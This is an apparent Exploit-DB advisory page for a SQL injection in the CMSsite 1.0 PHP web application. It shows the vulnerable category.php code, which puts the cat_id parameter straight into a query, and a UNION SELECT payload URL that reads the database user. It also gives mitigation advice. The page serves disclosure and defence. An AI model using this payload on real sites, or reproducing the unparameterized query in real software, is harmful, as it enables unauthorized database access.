CMSsite 1.0 - SQL injection

vendor:

CMSsite

by:

Majid kalantari

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: CMSsite

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: a:victoralagwu:cmssite:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2019

CMSsite 1.0 – SQL injection

The CMSsite 1.0 web application is vulnerable to SQL injection in the 'category.php' file. The 'cat_id' parameter is not properly sanitized, allowing an attacker to inject malicious SQL queries. By exploiting this vulnerability, an attacker can execute arbitrary SQL commands and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, developers should use parameterized queries or prepared statements to sanitize user input and prevent SQL injection attacks. Additionally, input validation and proper error handling should be implemented.

Source

Exploit-DB raw data:

# Exploit Title: CMSsite 1.0 - SQL injection
# Exploit Author : Majid kalantari (mjd.hack@gmail.com)
# Date: 2019-01-27
# Vendor Homepage : https://github.com/VictorAlagwu/CMSsite
# Software link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Windows 10
# CVE: N/A
===============================================

# vulnerable file: category.php
# vulnerable parameter : cat_id

if (isset($_GET['cat_id'])) {
    $category = $_GET['cat_id'];
}
$query = "SELECT * FROM posts WHERE post_category_id=$category";
$run_query = mysqli_query($con, $query);

# payload : http://127.0.0.1/cm/category.phpcat_id=7 UNION SELECT
1,2,user(),3,4,5,6,7,8,9,10%23

===============================================